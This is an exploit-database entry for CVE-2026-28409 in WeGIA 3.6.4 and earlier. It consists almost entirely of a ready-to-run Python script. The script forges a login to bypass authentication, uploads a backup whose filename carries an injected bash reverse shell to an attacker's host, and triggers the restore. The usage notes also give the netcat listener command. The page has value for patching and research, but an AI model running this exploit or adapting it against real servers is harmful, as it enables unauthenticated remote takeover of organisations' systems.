WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection

2026.03.03
Credit: Mohammed Idrees Banyamer
Risk: High
Local: No
Remote: Yes
CVE: CVE-2026-28409
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command (&#039;OS Command Injection&#039;))

#!/usr/bin/env python3 # Exploit Title: WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection in Backup Restore # CVE: CVE-2026-28409 # Date: 2026-02-28 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA # Software Link: https://github.com/LabRedesCefetRJ/WeGIA # Affected: WeGIA <= 3.6.4 # Tested on: # Category: Webapps # Platform: PHP # Exploit Type: Remote # CVSS: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) # CWE: CWE-78 # Description: OS Command Injection in backup/restore functionality allowing unauthenticated RCE when combined with authentication bypass # Fixed in: 3.6.5 # Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://192.168.1.100/WeGIA --lhost 192.168.1.50 --lport 4444 # # Options: # --lhost Attacker IP for reverse shell # --lport Attacker listening port # # Notes: # - Requires netcat listener: nc -lvnp <port> # - Uses authentication bypass + command injection in filename during restore # - Payload is reverse shell via bash # # How to Use # # Step 1: Start listener # nc -lvnp 4444 # # Step 2: Run exploit # python3 exploit.py http://target/WeGIA --lhost 10.10.14.5 --lport 4444 import requests import urllib3 import urllib.parse import argparse import sys import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-28409 • WeGIA Backup Restore Command Injection ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """ print(BANNER) def parse_args(): parser = argparse.ArgumentParser(description="WeGIA CVE-2026-28409 RCE Exploit") parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100/WeGIA)") parser.add_argument("--lhost", required=True, help="Attacker IP for reverse shell") parser.add_argument("--lport", required=True, help="Attacker listening port") return parser.parse_args() def build_payload(lhost, lport): revshell = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'" filename = f"dump;{revshell};poc.tar.gz" return filename def main(): args = parse_args() base_url = args.target.rstrip('/') lhost = args.lhost lport = args.lport session = requests.Session() session.verify = False malicious_filename = build_payload(lhost, lport) print(f"[*] Generated malicious filename: {malicious_filename}") dummy_content = ( b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03" b"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00" ) print("[*] Attempting authentication bypass + admin session") login_url = f"{base_url}/html/login.php" bypass_data = { 'c': 'true', 'cpf': 'admin', 'id_pessoa': '1' } try: r = session.post(login_url, data=bypass_data, timeout=10) if r.status_code != 200: print(f"[-] Login bypass failed (status {r.status_code})") sys.exit(1) print("[+] Auth bypass appears successful") except Exception as e: print(f"[-] Connection error during login: {e}") sys.exit(1) print("[*] Uploading dummy backup with malicious filename") upload_url = f"{base_url}/html/configuracao/importar_dump.php" files = { 'import': (malicious_filename, dummy_content, 'application/gzip') } upload_data = { 'usuario': '1', 'id_pessoa': '1' } try: r = session.post(upload_url, files=files, data=upload_data, timeout=12) if r.status_code not in (200, 201, 302): print(f"[-] Upload failed (status {r.status_code})") sys.exit(1) print("[+] Upload completed") except Exception as e: print(f"[-] Upload error: {e}") sys.exit(1) print("[*] Triggering restore → attempting RCE") restore_url = f"{base_url}/html/configuracao/gerenciar_backup.php" params = { 'action': 'restore', 'file': malicious_filename, 'usuario': '1', 'id_pessoa': '1' } try: r = session.get(restore_url, params=params, allow_redirects=False, timeout=15) print("[*] Restore request sent") print("[*] Check your listener for incoming reverse shell") print(f"[*] If no connection after 10-20s → target may be patched / firewall blocked / wrong path") except Exception as e: print(f"[-] Error during restore trigger: {e}") print("\nExploit finished. Waiting for shell...\n") if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top